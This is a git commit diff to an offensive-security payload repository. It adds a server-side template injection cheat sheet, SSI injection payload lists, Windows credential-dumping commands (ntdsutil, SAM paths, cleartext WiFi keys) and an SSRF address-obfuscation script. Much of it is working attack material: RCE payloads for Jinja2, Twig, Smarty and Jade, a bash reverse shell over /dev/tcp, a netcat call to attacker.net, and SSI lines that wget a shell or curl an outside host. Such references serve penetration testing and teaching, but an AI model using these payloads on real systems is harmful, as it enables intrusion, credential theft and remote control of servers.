Bugfix - Errors in stashed changes

2024-06-09 05:16:26 +02:00 · 2019-01-28 20:27:45 +01:00 · 2019-01-28 20:27:45 +01:00 · b9f2fe367c
parent cd2d76d538
commit b9f2fe367c
15 changed files with 1823 additions and 3 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -1,6 +1,6 @@
 # Cross-Site Request Forgery

-> Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
+> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP


 ## Summary
@ -14,6 +14,8 @@

 ## Payloads

+When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
+
 ### HTML GET – Requiring User Interaction for Proof-of-Concept

 ```html
@ -98,4 +100,5 @@ xhr.send('{"role":admin}');
 - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd
 - [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani
 - [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
+- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
+- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
--- a/Resources/Active
+++ b/Resources/Active
@ -185,6 +185,12 @@ ifm: quit
 ntdsutil: quit
 ```

+or 
+
+```powershell
+ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
+```
+
 #### Using Vshadow

 ```powershell
--- a/Resources/Windows
+++ b/Resources/Windows
@ -225,6 +225,39 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 C:\inetpub\wwwroot\web.config
 ```

+### Other files
+
+```bat
+%SYSTEMDRIVE%\pagefile.sys
+%WINDIR%\debug\NetSetup.log
+%WINDIR%\repair\sam
+%WINDIR%\repair\system
+%WINDIR%\repair\software, %WINDIR%\repair\security
+%WINDIR%\iis6.log
+%WINDIR%\system32\config\AppEvent.Evt
+%WINDIR%\system32\config\SecEvent.Evt
+%WINDIR%\system32\config\default.sav
+%WINDIR%\system32\config\security.sav
+%WINDIR%\system32\config\software.sav
+%WINDIR%\system32\config\system.sav
+%WINDIR%\system32\CCM\logs\*.log
+%USERPROFILE%\ntuser.dat
+%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
+%WINDIR%\System32\drivers\etc\hosts
+```
+
+### Wifi passwords
+
+Find AP SSID
+```bat
+netsh wlan show profile
+```
+
+Get Cleartext Pass
+```bat
+netsh wlan show profile <SSID> key=clear
+```
+
 ## Processes Enumeration and Tasks

 What processes are running?
@ -372,4 +405,4 @@ runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
 * [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
 * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
 * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
-* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
+* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
--- a/Injection/Images/serverside.png
+++ b/Injection/Images/serverside.png
--- a/Injection/Intruder/JHADDIX_SSI_Injection.txt
+++ b/Injection/Intruder/JHADDIX_SSI_Injection.txt
@ -0,0 +1,75 @@
+<pre><!--#exec cmd="ls" --></pre>
+<pre><!--#echo var="DATE_LOCAL" --> </pre>
+<pre><!--#exec cmd="whoami"--></pre>
+<pre><!--#exec cmd="dir" --></pre>
+<!--#exec cmd="ls" -->
+<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
+<!--#exec cmd="/bin/ls /" -->
+<!--#exec cmd="dir" -->
+<!--#exec cmd="cd C:\WINDOWS\System32">
+<!--#config errmsg="File not found, informs users and password"-->
+<!--#echo var="DOCUMENT_NAME" -->
+<!--#echo var="DOCUMENT_URI" -->
+<!--#config timefmt="A %B %d %Y %r"-->
+<!--#fsize file="ssi.shtml" -->
+<!--#include file=?UUUUUUUU...UU?-->
+<!--#echo var="DATE_LOCAL" --> 
+<!--#exec cmd="whoami"--> 
+<!--#printenv -->
+<!--#flastmod virtual="echo.html" -->
+<!--#echo var="auth_type" -->
+<!--#echo var="http_referer" -->
+<!--#echo var="content_length" -->
+<!--#echo var="content_type" -->
+<!--#echo var="http_accept_encoding" -->
+<!--#echo var="forwarded" -->
+<!--#echo var="document_uri" -->
+<!--#echo var="date_gmt" -->
+<!--#echo var="date_local" -->
+<!--#echo var="document_name" -->
+<!--#echo var="document_root" -->
+<!--#echo var="from" -->
+<!--#echo var="gateway_interface" -->
+<!--#echo var="http_accept" -->
+<!--#echo var="http_accept_charset" -->
+<!--#echo var="http_accept_language" -->
+<!--#echo var="http_connection" -->
+<!--#echo var="http_cookie" -->
+<!--#echo var="http_form" -->
+<!--#echo var="http_host" -->
+<!--#echo var="user_name" -->
+<!--#echo var="unique_id" -->
+<!--#echo var="tz" -->
+<!--#echo var="total_hits" -->
+<!--#echo var="server_software" -->
+<!--#echo var="server_protocol" -->
+<!--#echo var="server_port" -->
+<!--#echo var="server_name -->
+<!--#echo var="server_addr" -->
+<!--#echo var="server_admin" -->
+<!--#echo var="script_url" -->
+<!--#echo var="script_uri" -->
+<!--#echo var="script_name" -->
+<!--#echo var="script_filename" -->
+<!--#echo var="netsite_root" -->
+<!--#echo var="site_htmlroot" -->
+<!--#echo var="path_translated" -->
+<!--#echo var="path_info_translated" -->
+<!--#echo var="request_uri" -->
+<!--#echo var="request_method" -->	
+<!--#echo var="remote_user" -->
+<!--#echo var="remote_addr" -->
+<!--#echo var="http_client_ip" -->
+<!--#echo var="remote_port" -->
+<!--#echo var="remote_ident" -->
+<!--#echo var="remote_host" -->
+<!--#echo var="query_string_unescaped" -->
+<!--#echo var="query_string" -->
+<!--#echo var="path_translated" -->
+<!--#echo var="path_info" -->
+<!--#echo var="path" -->
+<!--#echo var="page_count" -->
+<!--#echo var="last_modified" -->
+<!--#echo var="http_user_agent" -->
+<!--#echo var="http_ua_os" -->
+<!--#echo var="http_ua_cpu" -->
--- a/Injection/Intruder/ssi_quick.txt
+++ b/Injection/Intruder/ssi_quick.txt
@ -0,0 +1,18 @@
+</nowiki>
+<!--#echo var="DOCUMENT_NAME" -->
+<!--#echo var="DOCUMENT_URI" -->
+<!--#config timefmt="A %B %d %Y %r"-->
+<!--#echo var="DATE_LOCAL" -->
+<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
+<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
+<!--#include virtual="/" -->
+<!--#exec cmd="ls" -->
+<!--#exec cmd="whoami" -->
+<!--#exec cmd="uname" -->
+<!--#exec cmd="dir" -->
+<!--#exec cmd="cat /etc/passwd" -->
+<!--#exec cmd="ipconfig" -->
+<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
+<!--#exec cmd="perl -e 'print "X"*5000'" -->
+<!--#exec cmd="sleep 5" -->
+<!--#exec cmd="sleep 10" -->
--- a/Injection/README.md
+++ b/Injection/README.md
@ -0,0 +1,327 @@
+# Templates Injections
+
+> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
+
+## Summary
+
+* [Tools](#tools)
+* [Methodology](#methodology)
+* [Ruby](#ruby)
+  * [Basic injection](#basic-injection)
+  * [Retrieve /etc/passwd](#retrieve--etc-passwd)
+  * [List files and directories](#list-files-and-directories)
+* [Java](#java)
+  * [Basic injection](#basic-injection)
+  * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
+  * [Retrieve /etc/passwd](#retrieve--etc-passwd)
+* [Twig](#twig)
+  * [Basic injection](#basic-injection)
+  * [Template format](#template-format)
+  * [Code execution](#code-execution)
+* [Smarty](#smarty)
+* [Freemarker](#freemarker)
+* [Jade / Codepen](#jade---codepen)
+* [Velocity](#velocity)
+* [Mako](#mako)
+* [Jinja2](#jinja2)
+  * [Basic injection](#basic-injection)
+  * [Template format](#template-format)
+  * [Dump all used classes](#dump-all-used-classes)
+  * [Dump all config variables](#dump-all-config-variables)
+  * [Read remote file](#read-remote-file)
+  * [Write into remote file](#write-into-remote-file)
+  * [Remote Code Execution](#remote-code-execution)
+  * [Filter bypass](filter-bypass)
+* [Jinjava](#jinjava)
+  * [Basic injection](#basic-injection)
+  * [Command execution](#command-execution)
+
+## Tools
+
+Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
+e.g:
+
+```powershell
+python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
+```
+
+## Methodology
+
+![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true)
+
+## Ruby
+
+### Basic injection
+
+```ruby
+<%= 7 * 7 %>
+```
+
+### Retrieve /etc/passwd
+
+```ruby
+<%= File.open('/etc/passwd').read %>
+```
+
+### List files and directories
+
+```ruby
+<%= Dir.entries('/') %>
+```
+
+## Java
+
+### Basic injection
+
+```java
+${7*7}
+${{7*7}}
+${class.getClassLoader()}
+${class.getResource("").getPath()}
+${class.getResource("../../../../../index.htm").getContent()}
+```
+
+### Retrieve the system’s environment variables
+
+```java
+${T(java.lang.System).getenv()}
+```
+
+### Retrieve /etc/passwd
+
+```java
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
+```
+
+## Twig
+
+### Basic injection
+
+```python
+{{7*7}}
+{{7*'7'}} would result in 49
+```
+
+### Template format
+
+```python
+$output = $twig > render (
+  'Dear' . $_GET['custom_greeting'],
+  array("first_name" => $user.first_name)
+);
+
+$output = $twig > render (
+  "Dear {first_name}",
+  array("first_name" => $user.first_name)
+);
+```
+
+### Code execution
+
+```python
+{{self}}
+{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
+{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+```
+
+## Smarty
+
+```python
+{php}echo `id`;{/php}
+{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
+```
+
+## Freemarker
+
+Default functionality.
+
+```python
+<#assign
+ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+```
+
+## Jade / Codepen
+
+```python
+- var x = root.process
+- x = x.mainModule.require
+- x = x('child_process')
+= x.exec('id | nc attacker.net 80')
+```
+
+## Velocity
+
+```python
+#set($str=$class.inspect("java.lang.String").type)
+#set($chr=$class.inspect("java.lang.Character").type)
+#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
+$ex.waitFor()
+#set($out=$ex.getInputStream())
+#foreach($i in [1..$out.available()])
+$str.valueOf($chr.toChars($out.read()))
+#end
+```
+
+## Mako
+
+```python
+<%
+import os
+x=os.popen('id').read()
+%>
+${x}
+```
+
+## Jinja2
+
+[Official website](http://jinja.pocoo.org/)
+> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
+
+### Basic injection
+
+```python
+{{4*4}}[[5*5]]
+{{7*'7'}} would result in 7777777
+```
+
+Jinja2 is used by Python Web Frameworks such as Django or Flask.
+The above injections have been tested on Flask application.
+
+### Template format
+
+```python
+{% extends "layout.html" %}
+{% block body %}
+  <ul>
+  {% for user in users %}
+    <li><a href="{{ user.url }}">{{ user.username }}</a></li>
+  {% endfor %}
+  </ul>
+{% endblock %}
+
+```
+
+### Dump all used classes
+
+```python
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
+{{ ''.__class__.__mro__[2].__subclasses__() }}
+```
+
+### Dump all config variables
+
+```python
+{% for key, value in config.iteritems() %}
+    <dt>{{ key|e }}</dt>
+    <dd>{{ value|e }}</dd>
+{% endfor %}
+```
+
+### Read remote file
+
+```python
+# ''.__class__.__mro__[2].__subclasses__()[40] = File class
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+```
+
+### Write into remote file
+
+```python
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
+```
+
+### Remote Code Execution
+
+Listen for connexion
+
+```bash
+nv -lnvp 8000
+```
+
+Inject this template
+
+```python
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
+{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
+{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
+```
+
+### Filter bypass
+
+```python
+request.__class__
+request["__class__"]
+```
+
+Bypassing `_`
+
+```python
+http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
+
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+```
+
+Bypassing `[` and `]`
+
+```python
+http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
+or
+http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
+```
+
+Bypassing `|join`
+
+```python
+http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
+```
+
+## Jinjava
+
+### Basic injection
+
+```python
+{{'a'.toUpperCase()}} would result in 'A'
+{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
+```
+
+Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
+
+### Command execution 
+
+Fixed by https://github.com/HubSpot/jinjava/pull/230
+
+```python
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+
+
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+```
+
+
+## References
+
+* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
+* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
+* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
+* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
+* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
+* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
+* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
+* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
+* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
+* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
+* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
+* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
--- a/Forgery/Files/ip.py
+++ b/Forgery/Files/ip.py
@ -0,0 +1,780 @@
+#!/usr/bin/python
+# coding=utf-8
+# https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py
+from __future__ import print_function
+from random import *
+from io import open
+import datetime
+import string
+import os
+import sys
+import platform
+import random
+
+EnclosedAlphanumericsData = {
+	'0' : ['⓪'],
+	'1' : ['①'],
+	'2' : ['②'],
+	'3' : ['③'],
+	'4' : ['④'],
+	'5' : ['⑤'],
+	'6' : ['⑥'],
+	'7' : ['⑦'],
+	'8' : ['⑧'],
+	'9' : ['⑨'],
+	'10' : ['⑩'],
+	'11' : ['⑪'],
+	'12' : ['⑫'],
+	'13' : ['⑬'],
+	'14' : ['⑭'],
+	'15' : ['⑮'],
+	'16' : ['⑯'],
+	'17' : ['⑰'],
+	'18' : ['⑱'],
+	'19' : ['⑲'],
+	'20' : ['⑳'],
+	'.' : ['。','｡'],
+	'a' : ['ⓐ'],
+	'b' : ['ⓑ'],
+	'c' : ['ⓒ'],
+	'd' : ['ⓓ'],
+	'e' : ['ⓔ'],
+	'f' : ['ⓕ'],
+	'x' : ['ⓧ'],
+}
+
+def RANDOM_TEXT_SPEC():
+	min_char = 12
+	max_char = 16
+	chars = string.ascii_letters + string.digits + "!$%^&*()<>;:,.|\~`"
+	return "".join(choice(chars) for x in range(randint(min_char, max_char)))
+
+def RANDOM_TEXT():
+	min_char = 12
+	max_char = 16
+	chars = string.ascii_letters + string.digits
+	return "".join(choice(chars) for x in range(randint(min_char, max_char)))
+
+def DECIMAL_SINGLE(NUMBER,STEP):
+	return int(NUMBER)*(256**STEP)
+
+def HEX_SINGLE(NUMBER,ADD0X):
+	if ADD0X == "yes":
+		return str(hex(int(NUMBER)))
+	else:
+		return str(hex(int(NUMBER))).replace("0x","")
+
+def OCT_SINGLE(NUMBER):
+	return str(oct(int(NUMBER))).replace("o","")
+
+def DEC_OVERFLOW_SINGLE(NUMBER):
+	return str(int(NUMBER)+256)
+
+def validIP(address):
+	parts = address.split(".")
+	if len(parts) != 4:
+		return False
+	try:
+		for item in parts:
+			if not 0 <= int(item) <= 255:
+				return False
+	except ValueError:
+		print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
+		exit(1)
+	return True
+
+def plain2EnclosedAlphanumericsChar(s0):
+	if s0 not in EnclosedAlphanumericsData:
+		raise Exception('value not found')
+	return random.choice(EnclosedAlphanumericsData[s0])
+
+def convertIP2EnclosedAlphanumericsValue():
+	IPAddressParts4EnclosedAlphanumerics = arg1.split(".")
+	returnEnclosedAlphanumericsIPAddress = ""
+	for x in range(0,4):
+		if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1])) <= 20 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]+IPAddressParts4EnclosedAlphanumerics[x][2])) >= 10:
+			returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]);
+			returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
+			if x <= 2:
+				returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
+		else:
+			returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]);
+			if len(IPAddressParts4EnclosedAlphanumerics[x]) >= 2:
+				returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][1]);
+			if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3:
+				returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
+			if x <= 2:
+				returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
+	return returnEnclosedAlphanumericsIPAddress
+
+def convert(s, recurse_chunks=True, error_on_miss=False):
+		if s in EnclosedAlphanumericsData:
+			return random.choice(EnclosedAlphanumericsData[s])
+		if recurse_chunks and len(s) > 1:
+			return convert(s[:-1]) + convert(s[-1])
+		if error_on_miss:
+			raise Exception('Value not found: %s' % s)
+		return s
+
+def convert_ip(ip, sep='.'):
+	return convert(sep).join([convert(chunk) for chunk in ip.split(sep)])
+
+if len(sys.argv) < 4 or len(sys.argv) >= 6:
+	print("\nUsage: python "+sys.argv[0]+" IP PORT WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
+	exit(1)
+
+redcolor='\x1b[0;31;40m'
+greencolor='\x1b[0;32;40m'
+yellowcolor='\x1b[0;33;40m'
+bluecolor='\x1b[0;36;40m'
+resetcolor='\x1b[0m'
+arg1 = str(sys.argv[1])
+
+if validIP(arg1) == False:
+	print("\n",yellowcolor,arg1,resetcolor,redcolor," is not a valid IPv4 address in dotted decimal format, example: 123.123.123.123",resetcolor,sep='')
+	print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
+	exit(1)
+
+ipFrag3, ipFrag2, ipFrag1, ipFrag0 = arg1.split(".")
+PORT=str(sys.argv[2])
+RANDPREFIXTEXT=RANDOM_TEXT()
+RANDPREFIXTEXTSPEC=RANDOM_TEXT_SPEC()
+RANDOMPREFIXVALIDSITE=str(sys.argv[3])
+FILENAME=''
+
+try:
+	sys.argv[4]
+except IndexError:
+	EXPORTRESULTS=''
+else:
+	EXPORTRESULTS=str(sys.argv[4])
+
+if EXPORTRESULTS == 'export':
+	FILENAME = "export-" + arg1 + "-" + str(datetime.datetime.now().strftime("%H-%M-%d-%m-%Y"))+'.txt'
+	pythonversion = (platform.python_version())
+	major, minor, patchlevel = pythonversion.split(".")
+	if major == "3":
+		f = open(FILENAME, 'w')
+	else:
+		f = open(FILENAME, 'wb')
+elif EXPORTRESULTS != '':
+	print("\nUsage: python "+sys.argv[0]+" IP WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
+	exit(1)
+
+#Case 1 - Dotted hexadecimal
+print("\n",sep='')
+print(bluecolor,"Dotted hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP1 = HEX_SINGLE(ipFrag3,"yes") + "." + HEX_SINGLE(ipFrag2,"yes") + "." + HEX_SINGLE(ipFrag1,"yes") + "." + HEX_SINGLE(ipFrag0,"yes")
+print('http://',IP1,':',PORT,'/',sep='')
+print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/','/',sep='')
+print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
+print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',sep='')
+print('http://',IP1,':',PORT,':80','/',sep='')
+print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP1,':',PORT,'/',file=f,sep='')
+	print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',file=f,sep='')
+	#===========================================================================
+	print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
+	print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
